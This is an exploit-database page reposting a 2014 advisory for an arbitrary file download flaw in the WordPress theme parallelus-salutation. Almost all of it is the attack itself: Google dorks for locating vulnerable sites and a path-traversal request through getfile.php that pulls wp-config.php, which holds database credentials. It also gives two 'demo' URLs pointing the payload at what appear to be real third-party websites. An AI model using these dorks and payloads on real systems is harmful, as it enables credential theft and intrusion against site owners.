Impacted by this exploit? Fix it here


JOB OFFER: Exploit Analyst (m/f)

Edit Report

WordPress theme parallelus-salutation Arbitrary File Download Vulnerability##############################################################
# Exploit Title: WordPress theme parallelus-salutation Arbitrary File Download Vulnerability .
#
# Exploit Author: Iran Cyber Security Group
#
# Discovered By: injector
#
# Dork 1: inurl:themes/parallelus-salutation/
#
# Dork 2: inurl:themes/parallelus-salutation/framework/
#
# Date: 18-12-2014
#
# Tested on: Kali, Win7
#
# Category: webapps
#
# platform: php
##############################################################

VULNERABILITY

##############

[~] VULNERABILITY}~~


[~] http://www.Site.com/wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php


##############

demo 1: www.scarabreseaXrch.com/wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php



demo 2: http://www.patcXhingprotocol.com/wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php

##############################################################

Comments?

Copyright ©2017 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.